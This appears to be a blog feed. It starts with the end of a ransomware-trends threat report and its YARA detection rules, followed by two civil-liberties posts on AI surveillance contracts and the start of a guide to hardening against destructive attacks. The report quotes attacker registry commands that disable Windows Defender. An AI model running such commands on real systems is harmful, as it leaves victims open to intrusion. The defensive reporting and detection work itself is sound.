  • In some cases, threat actors used benign names in their operations in an attempt to masquerade as legitimate software or system resources. For example, in a RIFTTEAR incident, threat actors registered a scheduled task named "\Microsoft\Update" to execute a malicious command likely intended to kill endpoint detection and response (EDR) processes. In a separate case involving CONTI, the ransomware binary had its filename renamed from "enc_lin" to "rsync" in an attempt to appear as the native synchronization command-line utility.

  • Ransomware actors often disabled or deleted backups to inhibit and/or limit recovery options. In some cases, threat actors stopped backup servers and/or deleted Volume Shadow Copies (VSS) via PowerShell scripts.

    • Notably, in a RANSOMHUB incident, the threat actors used the access to Cisco Integrated Management Controller (CIMC) to map a Debian Linux ISO image via Virtual Media across a nine-node Cohesity cluster. By modifying the boot priority and hardware power-cycling, the nodes booted into the external Linux environment, overwriting the Cohesity operating system (OS) and rendering the backup data inaccessible.

  • In a handful of intrusions, the threat actors used tooling to terminate processes and services associated with security software solutions, specifically those abusing signed kernel mode drivers. Examples include the open-source TERMINATOR and WATCHDOGKILLER, as well as non-publicly available tools such as WARCLAW, a utility that decodes and installs a vulnerable kernel mode driver.

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f 

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1"

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

Figure 14: Windows Defender registry key modification

Tool Prevalence

Throughout 2025, we continued to see ransomware actors rely heavily on publicly available tools and legitimate software across various stages of ransomware intrusions. While legitimate software remains popular, we observed a slight decrease in the use of RMM tools and post-exploitation C2 frameworks. Notably, both WinRAR and Rclone were observed in almost one-fourth of incidents, likely corresponding with the increase in incidents involving data theft, given that these tools are regularly used to stage and exfiltrate data respectively.

  • Threat actors used post-exploitation C2 frameworks in about 15% of 2025 ransomware incidents, a decrease from almost 20% in 2024. The decline in the use of post-exploitation frameworks is largely due to the continued reduction in use of Cobalt Strike BEACON.

    • Cobalt Strike BEACON was deployed in only 2% of 2025 ransomware incidents, continuing a multi-year downward trend; in 2021 roughly 60% of ransomware incidents involved BEACON, dropping to around 38% in 2022, 20% in 2023, and 11% in 2024. This decrease could in part be attributed to some subset of actors exploring new frameworks, like AdaptixC2.

    • We observed approximately 8% of intrusions involving the AdaptixC2 (ADAPTAGENT) post-exploitation framework. AdaptixC2 is an open-source post-exploitation framework developed for penetration testers; however, similar to the use of CobaltStrike for many years, threat actors often abuse these types of pentesting tools to facilitate their operations.

    • Less frequently, we observed the penetration frameworks associated with MYTHICAGENT, METASPLOIT, HAVOC, and EXPLORATIONC2.

  • Extending a trend identified last year, threat actors appear slightly less reliant on remote management tools. Around 24% of 2025 incidents involved at least one RMM, compared to 28% in 2024, and 40% in 2023.

    • We observed 10 unique remote management tools in ransomware incidents in 2025 comparable to nine in 2024, but an overall decrease from 13 in 2023.

    • We also saw a decrease in instances of threat actors leveraging multiple different RMMs within the same intrusion. In 2025, multiple RMMs were only observed in ~5% of incidents, compared to 8% in 2024, and 16% in 2023.

    • Consistent with recent years, AnyDesk remained the most commonly deployed RMM in ransomware incidents in 2025; however, overall use decreased from roughly 31% in 2023 and 16% in 2024 to 10% in 2025.

  • Threat actors' use of tunnelers remained fairly consistent as compared to 2024; however, there were small shifts in the use of specific tunnelers. For example, CLOUDFLARED was observed in 8% of incidents in 2025 compared to around 4% in 2024.

    • We've observed a negligible decline in the use of SYSTEMBC, with around 14% of incidents involving the tunneler in 2023, a little over 7% in 2024, and down to a little over 6% in 2025. Notably, Operation Endgame disrupted SYSTEMBC infrastructure in May 2024; while the malware is still being sold on forums, it's plausible that the law enforcement disruption dissuaded some threat actors from continuing to use the malware in their operations.

  • Throughout 2025, threat actors continued to leverage common publicly available network scanning tools such as Advanced IP Scanner and SoftPerfect Network Scanner in around 50% of intrusions, consistent with the 2024 rate.

  • In 2025, we observed an increase in the use of public tools like WinRAR and Rclone that are often used by threat actors to facilitate data theft, which aligns with our overall increase in incidents involving suspected or confirmed data theft from 2024 to 2025. Both WinRAR and Rclone were observed in approximately 23% of incidents; in 2024, we observed around 16% of intrusions involving Rclone and only around 8% involving WinRAR.

Remediation and Hardening

Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

Outlook and Implications

Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. Several indicators suggest the overall profitability of these operations is, however, declining, and at least some threat actors are shifting their targeting calculus away from large companies to instead focus on higher volume attacks against smaller organizations. This is likely due to increased difficulty in successful deployments due to victims' improved security postures, a greater refusal to pay ransom demands, and enhanced recovery capabilities. In the coming years, evolving regulations, including reporting requirements and payment bans, may further dissuade some companies from making ransom payments. While we anticipate ransomware to remain one of the most dominant threats globally, the reduction in profits may cause some threat actors to seek other monetization methods. This could manifest as increased data theft extortion operations, the use of more aggressive extortion tactics, or opportunistically using access to victim environments for secondary monetization mechanisms such as using compromised infrastructure to send phishing messages.

Detections

YARA Rules

AGENDA
rule M_APTFIN_Ransom_AGENDA_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$conf1 = "public_rsa_pem" fullword
		$conf2 = "private_rsa_pem" fullword
		$conf3 = "directory_black_list" fullword
		$conf4 = "file_black_list" fullword
		$conf5 = "file_pattern_black_list" fullword
		$conf6 = "process_black_list" fullword
		$conf7 = "win_services_black_list" fullword
		$conf8 = "company_id" fullword
		$conf9 = "note" fullword
		$load_const1 = { 21 B7 F6 F7 }
		$load_const2 = { F6 36 A4 69 }
		$load_s1 = "run_portable_executable" fullword
		$load_s2 = "MemoryLoadLibrary" fullword
		$load_s3 = "_ZN9morph_poc4main"
		$note1 = "Extension: "
		$note2 = "Domain: "
		$note3 = "login: "
		$note4 = "password: "
		$note5 = "Enter credentials-- Credentials"
		$note6 = "-- Qilin"
		$note7 = "-- Recovery"
		$note8 = "www.torproject.org"
		$note9 = ".onion"
		$note10 = "Employees personal data, CVs, DL , SSN."
		$note11 = "%s/%s_RECOVER.txt"
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (7 of ($conf*) or 7 of ($note*) or all of ($load*))
}
AGENDA.RUST
rule M_Hunting_Win_Ransomware_AGENDA_RUST_2_MBeta {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$rust = "/rust/"
		$conf1 = "\"public_rsa_pem\":"
		$conf2 = "\"private_rsa_pem\":"
		$conf3 = "\"directory_black_list\":"
		$conf4 = "\"file_black_list\":"
		$conf5 = "\"file_pattern_black_list\":"
		$conf6 = "\"process_black_list\":"
		$conf7 = "\"win_services_black_list\":"
		$conf8 = "\"company_id\":"
		$conf9 = "\"n\":"
		$conf10 = "\"p\":"
		$conf11 = "\"fast\":"
		$conf12 = "\"skip\":"
		$conf13 = "\"step\":"
		$conf14 = "\"accounts\":"
		$conf15 = "\"note\":"
	condition:
		uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize < 5MB and (($rust and 8 of ($conf*)) or (13 of ($conf*)))
}
REDBIKE
rule M_Ransom_REDBIKE_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$a1 = ".akira"
		$a2 = "akira_readme.txt"
		$a3 = "akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id"
		$s1 = "--encryption_percent" ascii wide nocase
		$s2 = "--encryption_path" ascii wide nocase
		$s3 = "--share_file" ascii wide nocase
	condition:
		((all of ($s*)) and (any of ($a*))) and (uint16(0) == 0x5A4D) and filesize > 500KB and filesize < 2MB
}
REDBIKE.LINUX
rule M_APTFIN_Ransom_REDBIKE_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$a = "akira_readme.txt"
		$b = "save your TIME, MONEY, EFFORTS"
		$c = "akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad.onion"
		$d = "--encryption_percent"
		$e = "--encryption_path"
		$f = "--share_file"
	condition:
		all of them and (uint32be(0) == 0x7F454C46)
}
CLOP
rule M_Hunting_CLOP_rol7XorHash32_ConfigHashes_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"

	strings:
		$hex_asm_literal_a = { 92 F7 53 7A }
		$hex_asm_literal_b = { 43 29 79 71 }
		$hex_asm_literal_c = { 2A 81 C4 E2 }
		$hex_asm_literal_d = { 2E F4 FA 7E }
		$hex_asm_literal_e = { 31 E5 7F 91 }
		$hex_asm_literal_f = { 16 24 45 D6 }
		$hex_asm_literal_g = { 56 22 93 EA }
	condition:
		all of them
}
CLOP.LINUX
rule M_Ransom_CLOP_3 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str_jobmessage_a = "Successfully started daemon-name"
		$str_jobmessage_b = "Could not change working directory to /"
		$str_jobmessage_c = "Could not generate session ID for child process"
		$asm_code_fileordirectory = { 25 00 F0 00 00 3D 00 40 00 00 75 }
		$asm_functioncall_open64_readfile = { 80 01 00 00 C7 44 ( 2? | 6? | A? | E? ) ?? 02 00 00 00 }
		$asm_functioncall_open64_writebytes = { B4 01 00 00 C7 44 ( 2? | 6? | A? | E? ) ?? 42 00 00 00 }
		$asm_encryption_filebuffersize = { 00 E1 F5 05 76 ?? C7 45 ?? 00 E1 F5 05 }
		$asm_encryption_generatekey = { 1F 89 ( C? | D? | E? | F? ) C1 ( C? | D? | E? | F? ) 18 8D ( 0? | 1? ) ( 0? | 1? ) 25 FF 00 [0-2] 29 ( C? | D? | E? | F? ) 83 ( C? | D? | E? | F? ) 01 C9 }
	condition:
		uint32(0) == 0x464C457F and all of ($str_*) or (#asm_code_fileordirectory == 2 and #asm_functioncall_open64_writebytes == 2 and ($asm_encryption_generatekey and $asm_functioncall_open64_readfile and $asm_encryption_filebuffersize))
}
PLAYCRYPT
rule M_Ransomware_PLAYCRYPT_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
		date_created = "2022-12-21"
		date_modified = "2022-12-21"
		rev = "1"
	strings:
		$c1 = { 8A CB 0F B6 D0 8B F2 8B FA D3 EE 8D 4B 01 D3 EF 83 E6 01 83 E7 01 }
		$c2 = { 8D 45 F0 C7 85 D0 FD FF FF 00 00 00 00 50 83 EC 08 }
		$c3 = { 8B 14 0A 8B 4C 32 20 03 D6 89 55 E0 03 CE }
		$c4 = { 8D 8D 80 ?? FF FF E8 C8 ?? FF FF 85 C0 75 61 83 BD [2] FF FF 05 76 58 }
		$c5 = { FF 76 ?? C6 45 EE 00 E8 [2] 00 00 8B F0 8B CF 33 C0 85 F6 0F 48 F0 E8 }
		$c6 = { FF D0 8B F8 83 FF 05 0F [2] 01 00 00 83 FF 06 0F [2] 01 00 00 8B 0E 3B 4E 04 0F [2] 01 00 00 83 FF 04 74 6D 83 FF 01 }
		$s1 = "OpaqueKeyBlob" wide
		$s2 = "AppPolicyGetProcessTerminationMethod"
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize > 100KB and filesize < 200KB and ((2 of ($c*) and all of ($s*)) or (4 of ($c*)))
}
PLAYCRYPT.LINUX
rule G_Ransom_PLAYCRYPT_LINUX_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "First step is done."
		$s2 = "/dev/urandom"
		$s3 = "esxcli storage filesystem list > storage"
		$s4 = "hosts in exclusion:"
		$s5 = "encrypt: "
		$s6 = ".PLAY" fullword
	condition:
		uint32(0) == 0x464C457F and all of them
}
SAFEPAY
import "pe"

rule G_Ransom_SAFEPAY_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$hex_asm_snippet = { 10 27 00 00 [0-4] 10 27 00 00 }
	condition:
		pe.imphash() == "ff67c703589f775db9aed5a03e4489b0" and ($hex_asm_snippet)
}
rule G_Ransom_SAFEPAY_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$code_string_decode = { 8A C2 32 C1 32 44 0D ?? 34 ?? 88 44 0D ?? 41 83 F9 04 [4-64] B? 4D 5A 00 00 }
		$code_hardware_aes_check = { 0F A2 8B F3 5B 89 07 89 77 ?? 89 4F ?? 89 57 [0-12] ( 00 00 00 02 | C1 ?? 19 ) }
		$code_encrypt_file = { 14 00 10 00 [2-24] 14 00 10 00 [2-32] 00 10 00 5? [0-8] FF ( 15 | D? ) }
		$enc_str1 = { C7 45 ?? 67 4B 3D 49 C7 45 ?? 2F 4F 2F 4D }
		$enc_str2 = { C7 45 ?? 10 3C 51 3E C7 45 ?? 5C 38 4F 3A C7 45 ?? 42 34 58 36 C7 45 ?? 43 30 58 32 66 C7 45 ?? 2D 2C }
		$enc_str3 = { C7 45 ?? A3 8F FF 8D C7 45 ?? EF 8B E4 89 C7 45 ?? E0 87 E0 85 C7 45 ?? E7 83 EC 81 C7 45 ?? FB 9F E8 9D C7 45 ?? FF 9B 98 99 }
		$enc_str4 = { C7 45 ?? 44 40 51 47 C7 45 ?? 51 49 10 10 C7 45 ?? 03 48 43 42 C6 45 ?? 29 }
		$enc_str5 = { C7 45 ?? 77 77 73 74 C7 45 ?? 75 6D 64 70 C7 45 ?? 23 68 63 62 C6 45 ?? 09 }
	condition:
		uint16(0) == 0x5a4d and (all of ($code*) or (any of ($code*) and any of ($enc*)) or (2 of ($enc*)))
}
INC
rule M_Ransom_INC_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[*] Count of arguments: %d" wide
		$s2 = "[-] Failed" wide
		$s3 = "[+] Start" wide
		$s4 = "INC-README" wide
		$s5 = "--debug" wide
		$s6 = "RECYCLE" wide
	condition:
		all of them and (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550)
}
INC (Lynx Branded)
rule M_Ransom_INC_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[+] Proccess %s with PID: %d was killed succesffully" wide
		$s2 = "[*] Sending note to printer:" wide
		$s3 = "[+] Recycling bin..." wide
		$s4 = "[*] Starting full encryption in 5s" wide
		$s5 = "[+] Successfully decoded readme!" wide
		$s6 = "[-] Failed" wide
		$lynx = "lynx" ascii wide nocase
	condition:
		$lynx and 4 of ($s*) and (uint16(0) == 0x5A4D) and filesize < 300KB and filesize > 50KB
}
INC (Sinobi Branded)
rule G_Ransom_INC_3 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[+] Proccess %s with PID: %d was killed succesffully" wide
		$s2 = "[*] Sending note to printer:" wide
		$s3 = "[+] Recycling bin..." wide
		$s4 = "[*] Starting full encryption in 5s" wide
		$s5 = "[+] Successfully decoded readme!" wide
		$s6 = "[-] Failed" wide
		$sin = "sinobi" ascii wide nocase
	condition:
		$sin and 4 of ($s*) and (uint16(0) == 0x5A4D) and filesize < 400KB and filesize > 50KB
}
INC.LINUX
rule M_Ransom_INC_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "[*] Count of arguments: %d"
		$s2 = "[-] Failed"
		$s3 = "[+] Start"
		$s4 = "INC-README"
		$s5 = "--debug"
		$s6 = "vmsvc"
	condition:
		all of them and uint32(0) == 0x464c457f
}
RANSOMHUB
rule M_Ransom_RANSOMHUB_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "json:\"settings\""
		$str2 = "json:\"extension\""
		$str3 = "json:\"net_spread\""
		$str4 = "json:\"local_disks\""
		$str5 = "json:\"running_one\""
		$str6 = "json:\"self_delete\""
		$str7 = "json:\"white_files\""
		$str8 = "json:\"white_hosts\""
		$str9 = "json:\"credentials\""
		$str10 = "json:\"kill_services\""
		$str11 = "json:\"set_wallpaper\""
		$str12 = "json:\"white_folders\""
		$str13 = "json:\"note_file_name\""
		$str14 = "json:\"note_full_text\""
		$str15 = "json:\"kill_processes\""
		$str16 = "json:\"network_shares\""
		$str17 = "json:\"note_short_text\""
		$str18 = "json:\"master_public_key\""
	condition:
		14 of them
}
FURYSTORM
rule G_Ransom_FURYSTORM_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Whitelist VM id"
		$s2 = "gwfn6l3bk45o2zecvi7xtyqrpsudmahj"
		$s3 = "Dry-run"
		$s4 = "-paths"
		$s5 = "-vmsvc"
		$s6 = "Note: motd=%d login=%d clean=%d"
		$s7 = "Cryptor args"
		$s8 = "VMX found"
		$s9 = "Keys: %016l"
		$s10 = "vim-cmd"
		$s11 = "Dropping readme"
		$s12 = "Encryption params"
	condition:
		uint32(0) == 0x464c457f and filesize > 50KB and filesize < 700KB and 6 of them
}
rule G_Ransom_FURYSTORM_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$s1 = "Failed decrypt file:"
		$s2 = "Decryptor args:"
		$s3 = "Private key loaded"
		$s4 = "Keys: %016l"
		$s5 = "Dry-run"
		$s6 = "Encryption params"
		$s7 = "Whitelist paths"
		$s8 = "Note: motd=%d"
	condition:
		uint32(0) == 0x464c457f and filesize > 50KB and filesize < 300KB and 6 of them
}
FIREFLAME
rule M_Autopatt_Ransom_FIREFLAME_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$p00_0 = { 8B CE 8D 5F ?? 8A 01 8D 49 ?? 0F B6 C0 83 E8 ?? 8D 04 40 C1 E0 ?? 99 }
		$p00_1 = { 55 8B EC FF 75 ?? E8 [4] 59 8B 4D ?? 89 01 F7 D8 1B C0 }
	condition:
		uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (($p00_0 in (0 .. 380000) and $p00_1 in (260000 .. 280000)))
}

Acknowledgements

This analysis would not have been possible without the assistance of Dima Lenz, Chastine Altares, Ana Foreman, and the Advanced Practices, Mandiant Consulting, and FLARE teams.

The Government Must Not Force Companies to Participate in AI-powered Surveillance

10 March 2026 at 21:39

The rapidly escalating conflict between Anthropic and the Pentagon, which started when the company refused to let the government use its technology to spy on Americans, has now gone to court. The Department of Defense retaliated by designating the company a “supply chain risk” (SCR). Now, Anthropic is asking courts to block the designation, arguing that the First Amendment does not permit the government to coerce a private actor to rewrite its code to serve government ends.

We agree.

As EFF, the Foundation for Individual Rights and Expression, and multiple other public interest organizations explained in a brief filed in support of Anthropic’s motion, the development and operation of large language models involve multiple expressive choices protected by the First Amendment. Requiring a company to rewrite its code to remove guardrails means compelling different expression, a clear constitutional violation. Further, the public record shows that the SCR designation is intended to punish the company both for pushing back and for its CEO’s public statements explaining that AI may supercharge surveillance practices that current law has proven ill-equipped to address.

As we also explain, the company’s concerns about how the government will use its technology are well-founded. The U.S. government has a long history of illegally surveilling its citizens without adequate judicial oversight based on questionable interpretations of its Constitutional and statutory obligations. The Department of Defense acquires vast troves of personal information from commercial entities, including individuals’ physical location, social media, and web browsing data. Other government agencies continue to collect and query vast quantities of Americans’ information, including by acquiring information from third party data brokers.

A growing body of social science research illustrates the chilling effects of these pervasive activities. Fearing retribution for unpopular views, dissenters stay silent. And AI only exacerbates the problem. AI can quickly analyze the government’s massive datasets or combine that information with data scraped off the internet, purchased through the commercial data broker market, or from local police surveillance devices and use all of that data to construct a comprehensive picture of a person’s life and infer sensitive details like their religious beliefs, medical conditions, political opinions, or even sex partners. For example, an agency could use AI to infer an individual’s association with a particular mosque based on data showing that they visited its website, followed its social media accounts, and were located near the mosque during religious services. AI can also deanonymize online speech by using public information to unmask anonymous users.

It is easy to conceive how an agency, a government employee with improper intent, or a malicious hacker could exploit these capabilities to monitor public discourse, preemptively squelch dissent, or persecute people from marginalized communities. Against this background and absent meaningful changes to the governing national security laws and judicial oversight structure, it is entirely reasonable for Anthropic—or any other company—to insist on its own guardrails.

Without action from Congress, the task of protecting your privacy has fallen in large part to Big Tech—something no one wants, including Big Tech. But if Congress won’t do it, companies like Anthropic must be allowed to step in, without facing retribution.

Weasel Words: OpenAI’s Pentagon Deal Won’t Stop AI‑Powered Surveillance

6 March 2026 at 17:03

OpenAI, the maker of ChaptGPT, is rightfully facing widespread criticism for its decisions to fill the gap the U.S. Department of Defense (DoD) created when rival Anthropic refused to drop its restrictions against using its AI for surveillance and autonomous weapons systems. After protests from both users and employees who did not sign up to support government mass surveillanceearly reports show that ChaptGPT uninstalls rose nearly 300% after the company announced the dealSam Altman, CEO of OpenAI, conceded that the initial agreement was “opportunistic and sloppy.” He then re-published an internal memo on social media stating that additions to the agreement made clear that “Consistent with applicable laws, including the Fourth Amendment to the United States Constitution, National Security Act of 1947, [and] FISA Act of 1978, the AI system shall not be intentionally used for domestic surveillance of U.S. persons and nationals.”

Trouble is, the U.S. government doesn’t believe “consistent with applicable laws” means “no domestic surveillance.” Instead, for the most part, the government has embraced a lax interpretation of “applicable law” that has blessed mass surveillance and large-scale violations of our civil liberties, and then fought tooth and nail to prevent courts from weighing in. 

"After all, many of the world’s most notorious human rights atrocities have historically been “legal” under existing laws at the time."

“Intentionally” is also doing an awful lot of work in that sentence. For years the government has insisted that the mass surveillance of U.S. persons only happens incidentally (read: not intentionally) because their communications with people both inside the United States and overseas are swept up in surveillance programs supposedly designed to only collect communications outside the United States. 

The company’s amendment to the contract continues in a similar vein, “For the avoidance of doubt, the Department understands this limitation to prohibit deliberate tracking, surveillance, or monitoring of U.S. persons or nationals, including through the procurement or use of commercially acquired personal or identifiable information.” Here, “deliberate” is the red flag given how often intelligence and law enforcement agencies rely on incidental or commercially purchased data to sidestep stronger privacy protections.

Here’s another one: “The AI System shall not be used for unconstrained monitoring of U.S. persons’ private information as consistent with these authorities. The system shall also not be used for domestic law-enforcement activities except as permitted by the Posse Comitatus Act and other applicable law.” What, one wonders, does “unconstrained” mean, precisely—and according to whom? 

Lawyers sometimes call these “weasel words” because they create ambiguity that protects one side or another from real accountability for contract violations. As with the Anthropic negotiations, where the Pentagon reportedly agreed to adhere to Anthropic’s red lines only “as appropriate,” the government is likely attempting to publicly commit to limits in principle, but retain broad flexibility in practice.

OpenAI also notes that the Pentagon promised the NSA would not be allowed to use OpenAI’s tools absent a new agreement, and that its deployment architecture will help it verify that no red lines are crossed. But secret agreements and technical assurances have never been enough to rein in surveillance agencies, and they are no substitute for strong, enforceable legal limits and transparency.

OpenAI executives may indeed be trying, as claimed, to use the company’s contractual relationship with the Pentagon to help ensure that the government should use AI tools only in a way consistent with democratic processes. But based on what we know so far, that hope seems very naïve.

Moreover, that naïvete is dangerous. In a time when governments are willing to embrace extreme and unfounded interpretations of “applicable laws,” companies need to put some actual muscle behind standing by their commitments. After all, many of the world’s most notorious human rights atrocities have historically been “legal” under existing laws at the time. OpenAI promises the public that it will  “avoid enabling uses of AI or AGI that harm humanity or unduly concentrate power,” but we know that enabling mass surveillance does both.     

OpenAI isn’t the only consumer-facing company that is, on the one hand, seeking to reassure the public that they aren’t participating in actions that violate human rights while, on the other, seeking to cash in on government mass surveillance efforts.  Despite this marketing double-speak, it is very clear that companies just cannot do both. It’s also clear that companies shouldn’t be given that much power over the limits of our privacy to begin with. The public should not have to rely on a small group of people—whether CEOs or Pentagon officials—to protect our civil liberties.

Proactive Preparation and Hardening Against Destructive Attacks: 2026 Edition

6 March 2026 at 15:00

Written by: Matthew McWhirt, Bhavesh Dhake, Emilio Oropeza, Gautam Krishnan, Stuart Carrera, Greg Blaum, Michael Rudden


UPDATE (March 13): Added guidance around abuse or misuse of endpoint / MDM platforms.

Background

Threat actors leverage destructive malware to destroy data, eliminate evidence of malicious activity, or manipulate systems in a way that renders them inoperable. Destructive cyberattacks can be a powerful means to achieve strategic or tactical objectives; however, the risk of reprisal is likely to limit the frequency of use to very select incidents. Destructive cyberattacks can include destructive malware, wipers, or modified ransomware.

When conflict erupts, cyber attacks are an inexpensive and easily deployable weapon. It should come as no surprise that instability leads to increases in attacks. This blog post provides proactive recommendations for organizations to prioritize for protecting against a destructive attack within an environment. The recommendations include practical and scalable methods that can help protect organizations from not only destructive attacks, but potential incidents where a threat actor is attempting to perform reconnaissance, escalate privileges, laterally move, maintain access, and achieve their mission. 

The detection opportunities outlined in this blog post are meant to act as supplementary monitoring to existing security tools. Organizations should leverage endpoint and network security tools as additional preventative and detective measures. These tools use a broad spectrum of detective capabilities, including signatures and heuristics, to detect malicious activity with a reasonable degree of fidelity. The custom detection opportunities referenced in this blog post are correlated to specific threat actor behavior and are meant to trigger anomalous activity that is identified by its divergence from normal patterns. Effective monitoring is dependent on a thorough understanding of an organization's unique environment and usage of pre-established baselines.

Organizational Resilience

While the core focus of this blog post is aligned to technical- and tactical-focused security controls, technical preparation and recovery are not the only strategies. Organizations that include crisis preparation and orchestration as key components of security governance can naturally adopt a "living" resilience posture. This includes:

  • Out-of-Band Incident Command and Communication: Establish a pre-validated, "out-of-band" communication platform that is completely decoupled from the corporate identity plane. This ensures that the key stakeholders and third-party support teams can coordinate and communicate securely, even if the primary communication platform is unavailable.

  • Defined Operational Contingency and Recovery Plans: Establish baseline operational requirements, including manual procedures for vital business functions to ensure continuity during restoration or rebuild efforts. Organizations must also develop prioritized application recovery sequences and map the essential dependencies needed to establish a secure foundation for recovery goals.

  • Pre-Establish Trusted Third-Party Vendor Relationships: Based on the range of technologies and platforms vital to business operations, develop predefined agreements with external partners to ensure access to specialists for legal / contractual requirements, incident response, remediation, recovery, and ransomware negotiations.

  • Practice and Refine the Recovery: Conduct exercises that validate the end-to-end restoration of mission-critical services using isolated, immutable backups and out-of-band communication channels, ensuring that recovery timelines (RTO) and data integrity (RPO) are tested, practiced, and current. 

Google Security Operations

Google Security Operations (SecOps) customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats, Mandiant Frontline Threats, Mandiant Hunting Rules, CDIR SCC Enhanced Data Destruction Alerts rule packs. The activity discussed in the blog post is detected in Google SecOps under the rule names:

  • BABYWIPER File Erasure

  • Secure Evidence Destruction And Cleanup Commands

  • CMD Launching Application Self Delete

  • Copy Binary From Downloads

  • Rundll32 Execution Of Dll Function Name Containing Special Character

  • Services Launching Cmd

  • System Process Execution Via Scheduled Task

  • Dllhost Masquerading

  • Backdoor Writing Dll To Disk For Injection

  • Multiple Exclusions Added To Windows Defender In Single Command

  • Path Exclusion Added to Windows Defender

  • Registry Change to CurrentControlSet Services

  • Powershell Set Content Value Of 0

  • Overwrite Disk Using DD Utility

  • Bcdedit Modifications Via Command

  • Disabling Crash Dump For Drive Wiping

  • Suspicious Wbadmin Commands

  • Fsutil File Zero Out

Recommendations Summary

Table 1 provides a high-level overview of guidance in this blog post.

Focus Area

Description

External-Facing Assets

Protect against the risk of threat actors exploiting an externally facing vector or leveraging existing technology for unauthorized remote access.

Critical Asset Protections

Protect specific high-value infrastructure and prepare for recovery from a destructive attack.

On-Premises Lateral Movement Protections

Protect against a threat actor with initial access into an environment from moving laterally to further expand their scope of access and persistence.

Credential Exposure and Account Protections

Protect against the exposure of privileged credentials to facilitate privilege escalation.

Preventing Destructive Actions in Kubernetes and CI/CD Pipelines

Protect the integrity and availability of Kubernetes environments and CI/CD pipelines.

Table 1: Overview of recommendations

1. External-Facing Assets

Identify, Enumerate, and Harden

To protect against a threat actor exploiting vulnerabilities or misconfigurations via an external-facing vector, organizations must determine the scope of applications and organization-managed services that are externally accessible. Externally accessible applications and services (including both on-premises and cloud) are often targeted by threat actors for initial access by exploiting known vulnerabilities, brute-forcing common or default credentials, or authenticating using valid credentials. 

To proactively identify and validate external-facing applications and services, consider:

  • Leveraging a vulnerability scanning technology to identify assets and associated vulnerabilities. 

  • Performing a focused vulnerability assessment or penetration test with the goal of identifying external-facing vectors that could be leveraged for authentication and access.

  • Verifying with technology vendors if the products leveraged by an organization for external-facing services require patches or updates to mitigate known vulnerabilities. 

Any identified vulnerabilities should not only be patched and hardened, but the identified technology platforms should also be reviewed to ensure that evidence of suspicious activity or technology/device modifications have not already occurred.

The following table provides an overview of capabilities to proactively review and identify external-facing assets and resources within common cloud-based infrastructures.

Cloud Provider

Attack Surface Discovery Capability

Google Cloud

Security Command Center

Amazon Web Services

AWS Config / Inspector

Microsoft Azure

Defender External Attack Surface Management (Defender EASM)

Table 2: Overview of cloud provider attack surface discovery capabilities

Enforce Multi-Factor Authentication

